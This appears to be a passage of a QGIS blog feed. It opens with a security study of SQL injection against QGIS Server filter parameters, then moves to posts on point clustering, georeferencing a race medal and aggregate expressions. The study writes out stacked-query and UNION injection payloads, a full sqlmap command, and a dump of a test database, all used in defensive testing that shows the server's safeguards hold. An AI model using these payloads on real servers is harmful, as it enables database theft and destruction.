<ServiceExceptionReport version="1.3.0" xmlns="http://www.opengis.net/ogc">
<ServiceException code="Filter string rejected">The filter string name = 'b' select has been rejected because of security reasons. Note: Text strings have to be enclosed in single or double quotes. A space between each word / special character is mandatory. Allowed Keywords and special characters are  AND,OR,IN,&lt;,>=,>,>=,!=,',',(,),DMETAPHONE,SOUNDEX. Not allowed are semicolons in the filter expression.</ServiceException>
</ServiceExceptionReport>

Filter Encoding

Filter Encoding is supported by QGIS Server in several ways and through various requests and parameters. However, it's another entry point for attackers! By the way, a series of patches was applied to MapServer several years ago because of vulnerabilities detected in the GetFeature request: stacked queries could be introduced within the OGC filter. So we took a look at how these XML filters are managed in QGIS Server.

As a first step, we looked at the GetFeature WFS request, which is able to digest an OGC XML filter thanks to the FILTER parameter:

http://myserver.com/qgisserver?
SERVICE=WFS&
REQUEST=GetFeature&
MAP=/home/user/project.qgs&
CRS=EPSG:32613&
TYPENAME=point&
FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>4</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

Actually, the filtering step is done with the XML tags <ogc:PropertyName> and <ogc:Literal>. According to the previous example, the underlying SQL query would be something like this:

SELECT * FROM point WHERE (pkuid = '4')

Obviously, an attacker could hope that a stacked query may be injected with a filter of this form:

FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>'); drop table point --</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

It's typically through this kind of thing that a malicious query could be introduced and executed by the underlying database in MapServer, before the patches and fixes. The same thing was also possible through the <ogc:PropertyName> tag. But the great news is that this kind of attack is not possible with QGIS Server, due to the implementation strategy. In fact, the filtering step is done with QgsExpression on the server side, so the SQL injection never reaches the database. However, it's probably not the most efficient approach…

While we're talking about GetFeature, it's worth mentioning that the EXP_FILTER parameter allows filtering by directly writing QGIS expressions. But the implementation logic is exactly the same as with FILTER, so there's no way to attack through it either.
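For illustration, a GetFeature request using EXP_FILTER might look like this (a sketch reusing the project and layer from the earlier examples; in practice the expression value needs to be URL-encoded):

http://myserver.com/qgisserver?
SERVICE=WFS&
REQUEST=GetFeature&
MAP=/home/user/project.qgs&
TYPENAME=point&
EXP_FILTER="name" = 'b'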

Another entry point for SQL injection with Filter Encoding is the SLD parameter of the WMS GetMap request. Styled Layer Descriptor (SLD) is a standard which allows users to define styling rules, extending the WMS standard. It makes it possible to write styling rules for specific features. Below is a very basic example:

<UserStyle>
    <se:Name>point</se:Name>
    <se:FeatureTypeStyle>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsGreaterThan>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsGreaterThan>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>circle</se:WellKnownName>
                    </se:Mark>
                    <se:Size>7</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsEqualTo>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsEqualTo>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>square</se:WellKnownName>
                    </se:Mark>
                    <se:Size>20</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
    </se:FeatureTypeStyle>
</UserStyle>

Then, the resulting image is something like this:

However, as previously described for the GetFeature request, the <ogc:Literal> XML tag may be vulnerable to SQL injections if precautions are not taken. And this time, the filtering step is done on the database side. So, according to the above example, the following query is executed:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = '1'))

But even when we try to inject a stacked query, characters considered malicious are duplicated. For example, with the XML tag <ogc:Literal>1')); drop table point --</ogc:Literal>, the following query is actually executed and an error is raised:

SELECT * FROM point WHERE (("pkuid" > '1'')); drop table point --'))
ERROR:  invalid input syntax for integer: "1')); drop table point --"

The single quote is duplicated so that it is treated as a literal quote within the string, and the stacked query is never executed. The same thing happens with a UNION-based attack:

SELECT * FROM point WHERE (("pkuid" > '1'')) UNION SELECT * FROM aoi --')
ERROR:  invalid input syntax for integer: "1')) union select * from aoi"

As regards the backslash character, with <ogc:Literal>\</ogc:Literal>:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = E'\\'))

SQLMap: an automated SQL injection tool

So far, manual tests have shown that, without the safety check, the server is vulnerable to some classic SQL injection attacks. But we hadn't really exploited the weak points until now.

Thus, we decided to run SQLMap, a penetration testing tool, with the safety check deactivated, against the whole range of attack types:

  • Boolean-based blind
  • Error-based
  • Union query-based
  • Stacked queries
  • Time-based blind
  • Inline queries

You know, just to see how far we could go! And it's frankly impressive… By exploiting the weak points described previously, SQLMap is able to retrieve the content of the full database, whether it is PostgreSQL or SQLite!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
......
......
$ ls ~/.sqlmap/output/localhost/dump/SQLite_masterdb/
aoi.csv                      idx_background_geometry_node.csv    sql_statements_log.csv
background.csv               idx_background_geometry_parent.csv  views_geometry_columns.csv
geometry_columns_auth.csv    idx_background_geometry_rowid.csv   views_layer_statistics.csv
geometry_columns.csv         layer_statistics.csv                virts_geometry_columns.csv
idx_aoi_geometry_node.csv    point.csv                           virts_layer_statistics.csv
idx_aoi_geometry_parent.csv  spatialite_history.csv
idx_aoi_geometry_rowid.csv   spatial_ref_sys.csv
$ cat ~/.sqlmap/output/localhost/dump/SQLite_masterdb/aoi.csv
pkuid,ftype
1,private_value

After this disturbing revelation, we re-ran SQLMap with the safety check activated. And you know what? It did not succeed in infiltrating the server, whatever we tried!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
[15:06:20] [INFO] testing connection to the target URL
[15:06:20] [WARNING] heuristic (basic) test shows that GET parameter 'FILTER' might not be injectable
[15:06:20] [INFO] testing for SQL injection on GET parameter 'FILTER'
[15:06:20] [WARNING] GET parameter 'FILTER' does not seem to be injectable
[15:06:20] [CRITICAL] all tested parameters appear to be not injectable.

Conclusion

The world of SQL injection is large and wide. As we noted throughout this study, many parameters have to be taken into account, such as the kind of database actually used, the extensions currently loaded, the robustness of passwords, …

Because of this, it's always difficult (if not impossible) to say that a service is totally bulletproof against these kinds of attacks. However, thanks to this study and the unit tests added to QGIS, we can confidently say that QGIS Server is very well protected against SQL injections, because none of our attacks reached their goal!

Even more aggregations: QGIS point cluster renderer

In the previous post, I demonstrated the aggregation support in QGIS expressions. Another popular request is to aggregate or cluster point features that are close to each other. If you have been following the QGIS project on the mailing list or on social media, you probably remember the successful cluster renderer crowdfunding campaign by North Road.

The point cluster renderer is implemented and can be tested in the current developer version. The renderer is highly customizable, for example, by styling the cluster symbol and adjusting the distance between points that should be in the same cluster:

Beyond this basic use case, the point cluster renderer can also be combined with categorized visualizations: cluster symbols can be colored in the corresponding category color and scaled by cluster size, as demoed in a video by the developer Nyall Dawson.
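If you want to experiment with this beyond the GUI options, the cluster symbol exposes the @cluster_size and @cluster_color variables for data-defined overrides. A sketch (the numeric bounds are placeholders) could scale the marker size with the number of clustered features and reuse the category color:

Data defined size:  scale_linear(@cluster_size, 2, 100, 3, 12)
Data defined color: @cluster_color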


Georeference a medal

Yesterday I ran the Zwolle half marathon wearing a hat with the previous QGIS logo. My time was not so special (2:08:47) but the medal I earned was. It shows a simple map of the city of Zwolle. You can see some buildings but which ones? I decided to georeference the medal and add … Continue reading Georeference a medal

Aggregate all the things! (QGIS expression edition)

In the past, aggregating field values was reserved for databases, virtual layers, or dedicated plugins, but since QGIS 2.16, there is a way to compute aggregates directly in QGIS expressions. This means that we can compute sums, means, counts, minimum and maximum values and more!

Here’s a quick tutorial to get you started:

Load the airports from the QGIS sample dataset. We’ll use the elevation values in the ELEV field for the following examples:

QGIS sample airport dataset – categorized by USE attribute

The most straightforward expressions are those that only have one parameter: the name of the field that should be aggregated, for example:

mean(ELEV)

We can also add a second parameter: a group-by field. For example, to group by the airport usage type, we use:

mean(ELEV,USE)

To top it all off, we can add a third parameter: a filter expression. For example, to show only military airports, we use:

mean(ELEV,USE,USE='Military')

Last but not least, all this aggregating goodness also works across layers! For example, here is the Alaska layer labeled with the airport layer feature count:

aggregate('airports','count',"ID")

If you are using relations, you can even go one step further and calculate aggregates on feature relations.
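For example, a sketch using the relation_aggregate() function (the relation id 'my_relation' is a placeholder for a relation defined in your project) computes an aggregate over a feature's related child features:

relation_aggregate('my_relation', 'mean', "ELEV")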

